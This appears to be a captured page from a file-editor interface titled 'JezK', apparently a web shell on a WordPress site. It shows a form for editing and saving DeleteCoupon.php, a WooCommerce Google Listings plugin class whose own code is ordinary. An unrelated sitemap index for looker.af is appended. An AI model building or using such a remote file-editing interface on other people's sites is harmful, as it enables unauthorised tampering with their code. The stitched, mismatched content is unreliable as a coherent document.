
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: DeleteCoupon.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
declare(strict_types = 1);
namespace Automattic\WooCommerce\GoogleListingsAndAds\Jobs;

use Automattic\WooCommerce\GoogleListingsAndAds\Coupon\CouponSyncerException;
use Automattic\WooCommerce\GoogleListingsAndAds\Google\DeleteCouponEntry;
use Automattic\WooCommerce\GoogleListingsAndAds\Vendor\Google\Service\ShoppingContent\Promotion as GooglePromotion;

defined( &#039;ABSPATH&#039; ) || exit();

/**
 * Class DeleteCoupon
 *
 * Delete existing WooCommerce coupon from Google Merchant Center.
 *
 * Note: The job will not start if it is already running.
 *
 * @package Automattic\WooCommerce\GoogleListingsAndAds\Jobs
 */
class DeleteCoupon extends AbstractCouponSyncerJob implements
	StartOnHookInterface {

	/**
	 * Get the name of the job.
	 *
	 * @return string
	 */
	public function get_name(): string {
		return &#039;delete_coupon&#039;;
	}

	/**
	 * Process an item.
	 *
	 * @param array[] $coupon_entries
	 *
	 * @throws JobException If no valid coupon data is provided as argument. The exception will be logged by ActionScheduler.
	 * @throws CouponSyncerException If an error occurs. The exception will be logged by ActionScheduler.
	 */
	public function process_items( array $coupon_entries ) {
		$wc_coupon_id     = $coupon_entries[0] ?? null;
		$google_promotion = $coupon_entries[1] ?? null;
		$google_ids       = $coupon_entries[2] ?? null;
		if ( ( ! is_int( $wc_coupon_id ) ) || empty( $google_promotion ) || empty( $google_ids ) ) {
			throw JobException::item_not_provided(
				&#039;Required data for the coupon to delete&#039;
			);
		}

		$this-&gt;coupon_syncer-&gt;delete(
			new DeleteCouponEntry(
				$wc_coupon_id,
				new GooglePromotion( $google_promotion ),
				$google_ids
			)
		);
	}

	/**
	 * Schedule the job.
	 *
	 * @param array[] $args
	 *
	 * @throws JobException If no coupon is provided as argument. The exception will be logged by ActionScheduler.
	 */
	public function schedule( array $args = [] ) {
		$coupon_entry = $args[0] ?? null;

		if ( ! $coupon_entry instanceof DeleteCouponEntry ) {
			throw JobException::item_not_provided(
				&#039;DeleteCouponEntry for the coupon to delete&#039;
			);
		}

		if ( $this-&gt;can_schedule( [ $coupon_entry ] ) ) {
			$this-&gt;action_scheduler-&gt;schedule_immediate(
				$this-&gt;get_process_item_hook(),
				[
					[
						$coupon_entry-&gt;get_wc_coupon_id(),
						$coupon_entry-&gt;get_google_promotion(),
						$coupon_entry-&gt;get_synced_google_ids(),
					],
				]
			);
		}
	}

	/**
	 * Get the name of an action hook to attach the job&#039;s start method to.
	 *
	 * @return StartHook
	 */
	public function get_start_hook(): StartHook {
		return new StartHook( &quot;{$this-&gt;get_hook_base_name()}start&quot; );
	}
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
